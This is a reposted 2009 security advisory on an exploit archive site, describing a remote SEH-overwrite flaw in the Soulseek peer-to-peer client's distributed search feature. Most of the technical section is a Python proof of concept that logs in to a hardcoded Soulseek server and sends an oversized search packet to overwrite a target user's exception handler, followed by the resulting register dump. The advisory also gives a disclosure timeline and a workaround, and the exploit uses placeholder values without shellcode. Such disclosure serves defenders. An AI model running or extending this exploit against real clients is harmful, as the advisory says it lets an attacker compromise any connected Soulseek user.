首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Soulseek 157 NS */ 156.* Remote Distributed Search Code Execution
来源:vfocus.net 作者:vfocus 发布时间:2009-05-27   
=============================================
- Release date: May 24th, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file 
sharing application.
One of the things that makes Soulseek(tm) unique is our community and 
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make 
new friends and expand your mind!"

III. DESCRIPTION
-------------------------
Soulseek client allows distributed file search to one person, everyone, or in a 
specific Soulseek IRC channel, allowing a user to find the files he wants, in 
a dedicated channel, or with his contacts, or on the whole network.
Unfortunatly this feature is vulnerable to a remote SEH overwrite to a specific
user, or even to a whole Soulseek IRC channel.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept is made to prevent a S-K party, it is only build to 
target the user "testt4321".

To try this proof of concept, you would have to open a soulseek client and use
the username:
"testt4321"
with the password:
"12345678"
And launch this code.
If you want to change the username or target a whole channel, you would have 
to reverse the protocol :)



#!/usr/bin/python
import struct
import sys, socket 
from time import *

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch

buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"

s.send(buffer)
sleep(1) 

junk = "\x41" * 3084
next_seh = struct.pack('<L', 0x42424242)
seh =      struct.pack('<L', 0x43434343)
other_junk = "\x61" * 1423

buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer2)
sleep(1)
s.recv(1024)



After the query is send, the memory will look like this
0012FBE4   41414141
0012FBE8   42424242  Pointer to next SEH record
0012FBEC   43434343  SE handler
0012FBF0   61616161

And the program will terminate with this structure:
EAX 00000000
ECX 43434343
EDX 7C9132BC ntdll.7C9132BC
EBX 00000000
ESP 0012EA78
EBP 0012EA98
ESI 00000000
EDI 00000000
EIP 43434343


V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek client connected to
the Soulseek network.

VI. SYSTEMS AFFECTED
-------------------------
Windows all versions

VII. SOLUTION
-------------------------
A fast solution would be to use Nicotine-Plus (http://nicotine-plus.sourceforge.net/) 
a Python Soulseek client.
Another quick workaround at server level would be to limit the search query lenght.

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-------------------------
May 24, 2009: Initial release


XI. DISCLOSURE TIMELINE
-------------------------
july      29, 2008: Bug discovered
September 03, 2008: Vendor contacted; no response.
October   14, 2008: Vendor contacted; still no response.
April     12, 2009: Idefense contacted.
April     13, 2009: Idefense answered.
April     23, 2009: Advisory send to idefense contributor program.
May       13, 2009: Idefense contacted, bug rejected (no reason given)
May       15, 2009: Idefense recontacted; no answer.
May       16, 2009: Last try to contact Soulseek maintainers
May       24, 2009: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or 
misuse of this information.

# [2009-05-26]
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ChinaGames (CGAgent.dll) Activ
·MiniTwitter 0.3-Beta (SQL/XSS)
·Mole Group Sky Hunter/Bus Tick
·Joomla Boy Scout Advancement 0
·Winamp <= 5.55 (MAKI script) U
·COWON America jetCast 2.0.4.11
·ZaoCMS (user_updated.php) Remo
·Dokuwiki 2009-02-14 Local File
·Winamp <= 5.55 (MAKI script) U
·ArcaVir 2009 < 9.4.320X.9 (ps_
·Winamp 5.551 MAKI Parsing Inte
·Winamp 5.551 MAKI Parsing Inte
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved